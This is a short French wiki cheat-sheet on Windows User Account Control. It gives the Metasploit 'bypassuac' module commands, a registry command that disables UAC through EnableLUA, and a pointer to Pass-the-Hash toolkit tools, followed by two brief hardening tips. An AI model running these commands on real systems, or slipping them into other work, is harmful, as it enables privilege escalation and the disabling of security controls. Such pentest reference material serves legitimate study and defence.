UAC

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Sigle User Account Control
Apparu Windows 7 / Vista
Contournement exploit/windows/local/bypassuac
Voir aussi Pass-the-hash · Registre

Le UAC (User Account Control) apparaît sous Windows 7 (et Vista) : il bloque les modifications système non autorisées. Metasploit propose un module de contournement à exécuter depuis une session existante.

Contournement

use exploit/windows/local/bypassuac
set session 1
exploit

Activer / désactiver l'UAC (registre)

Désactiver :

C:\Windows\System32\cmd.exe /k %windir%/System32/reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Activer :

C:\Windows\System32\cmd.exe /k %windir%/System32/reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

Passing the Hash Toolkit

find /usr/bin/ -name "pth-*"
pth-smbget

Voir Pass-the-hash pour la réutilisation directe du hash.

Se protéger

  • Maintenir l'UAC activé sur les postes clients.
  • Refuser l'usage du hash LM et forcer NTLMv2.

Voir aussi